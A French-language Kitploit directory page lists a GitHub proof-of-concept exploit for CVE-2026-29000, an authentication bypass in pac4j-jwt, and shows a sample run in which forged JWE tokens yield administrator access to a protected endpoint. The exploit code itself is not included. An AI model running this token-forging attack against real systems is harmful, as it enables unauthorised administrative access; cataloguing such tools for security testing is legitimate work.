Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC — Preuve de concept d'exploitation pour CVE-2026-29000, un contournement d'authentification dans pac4j-jwt. Forge des jetons JWT pour obtenir un accès administrateur aux points de terminaison protégés. | Kitploit
Outils/GitHubGitHub/manbahadurthapa1248/cve-2026-29000---pac4j-jwt-authentication-bypass-poc
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubmanbahadurthapa1248/cve-2026-29000---pac4j-jwt-authentication-bypass-poc

CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC

Preuve de concept d'exploitation pour CVE-2026-29000, un contournement d'authentification dans pac4j-jwt. Forge des jetons JWT pour obtenir un accès administrateur aux points de terminaison protégés.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
16il y a 6 moisPas encore vérifié
Partager

CVE-2026-29000 - Contournement d'authentification pac4j-jwt PoC

Note : Ceci n'est pas mon travail original. Je le conserve ici à titre de référence.

Méthodologie de travail :

root@kitploit:~
python3 exploit.py http://IP:PORT

[*] Fetching JWKS...
[+] Got RSA public key (kid: enc-key-1)
[*] Crafted PlainJWT with sub=admin, role=ROLE_ADMIN
[+] Forged JWE token created

[*] Accessing /api/dashboard...
[+] Status: 200
[+] Authenticated as: admin (ROLE_ADMIN)
[+] Token: eyJhbGciOiAiUlN_.....[Redacted].....D4zwSEY05lFkCB.J933HR-irY6a0r2uivRLZw
Télécharger l’outil